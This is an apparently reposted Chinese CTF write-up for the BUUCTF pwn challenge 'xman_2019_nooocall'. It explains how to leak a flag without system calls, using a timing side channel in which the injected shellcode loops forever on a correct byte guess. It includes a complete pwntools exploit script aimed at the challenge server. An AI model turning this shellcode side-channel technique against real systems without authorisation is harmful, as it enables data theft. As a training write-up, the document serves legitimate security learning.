其他分享
首页 > 其他分享> > [BUUCTF] xman_2019_nooocall

[BUUCTF] xman_2019_nooocall

作者:互联网

xman_2019_nooocall

总结

可以输入shellcode,但是又不能使用任何系统调用。因此,可以使用侧信道攻击,通过一些现象、反馈等猜测出flag。侧信道常用的反馈有错误、死循环、异常分支等。这里采用死循环,步骤为:

buuctf上的flag都是uuid字符串,因此猜测的字符的范围限于0123456789abcdef-

EXP

from pwn import *

context.arch="amd64"
context.os='linux'
context.endian="little"
context.log_level="error"

shellcode = """
add al, 2
sal rax, 32
mov bl, byte ptr [rax+{}]
cmp bl, {}
jz $-0x3 
"""

possible_char="0123456789abcdef-}"
pi = [ord(x) for x in possible_char]

flag = 'flag{'
idx = 5
n = 32
ip = 'node4.buuoj.cn'
port = 28277
print("ip: {}, port: {}".format(ip, port))
while 1:
    bb = True
    for x in pi:
        # p = process("./xman_2019_nooocall")
        p = remote(ip, port)
        p.sendafter("Your Shellcode >>", asm(shellcode.format(idx, x)))
        bb = p.can_recv(timeout=3)
        p.close()
        if not bb:
            flag += chr(x)
            print(f"current flag: {flag}")
            break

    if flag.endswith("}"):
        break
    if bb:
        print("something wrong...")
        continue

    idx += 1

image-20211030001254942

引用与参考

1、My Blog

2、Ctf Wiki

3、pwncli

标签:xman,BUUCTF,bb,ip,flag,2019,context,shellcode,port
来源: https://www.cnblogs.com/LynneHuan/p/15674233.html